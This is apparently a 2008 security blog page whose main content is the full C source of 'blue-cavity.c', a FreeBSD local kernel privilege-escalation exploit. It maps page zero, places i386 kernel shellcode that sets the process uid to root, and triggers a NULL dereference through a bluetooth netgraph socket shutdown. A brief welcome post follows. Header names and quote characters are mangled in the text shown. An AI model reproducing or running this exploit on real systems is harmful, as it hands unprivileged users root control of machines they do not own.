tooth decay…

christer — Wed, 24 Dec 2008 20:49:08 +0000

/* blue-cavity.c
 *
 * FreeBSD >= 5.x local kernel root exploit for netgraph sockets...
 * by christer - Wed 29 Oct 2008
 *
 * - Tested on: FreeBSD 7.0 (x86)
 *
 * This particular exploit requires a configured bluetooth device.
 * Look at src if you need to know why, if you don't have a bt dev
 * on the target you may get lucky with other netgraph stuff
 *
 *    - Private Source Code -DO NOT DISTRIBUTE -
 * http://www.bsdcitizen.org/ -- BSDCITIZEN 2008!@$!
 *
 * BSDCITIZEN source code may NOT be used by penetration testers
 * without written consent from BSDCITIZEN!!!
 *
 * christer [ at ] signedness.org / bsdcitizen.org
 */

#include 
#include 
#include 
#include 
#include 
#include 
#include 
#include 

/*
 / Kernel shellcode for i386.. don’t do anything stupid like
 / trying it on ADM64 kernels etc….
 */

static unsigned char shell[]=
 “\x64\xa1\x00\x00\x00\x00\x8b\x40″
 “\x04\x8b\x40\x30\xc7\x40\x04\x00″
 “\x00\x00\x00\xc3″;

main()
{
  int s;
  if(mmap(0,0×1000,PROT_READ|PROT_WRITE,MAP_FIXED|MAP_ANON,-1,0)==
      MAP_FAILED)
    err(1,”mmap”);

  memcpy((void *)0×0,shell,sizeof(shell));
  s=socket(PF_BLUETOOTH,SOCK_RAW,BLUETOOTH_PROTO_HCI);
  if(s<0)
    err(1,”socket”);

  shutdown(s,SHUT_WR);

  return 0×1337;
}

hmmm, starting easy, continuing hard

mu-b — Wed, 10 Dec 2008 13:57:00 +0000

We wish you a belated welcome to the premier info sec blog that is bsdcitizen.org! .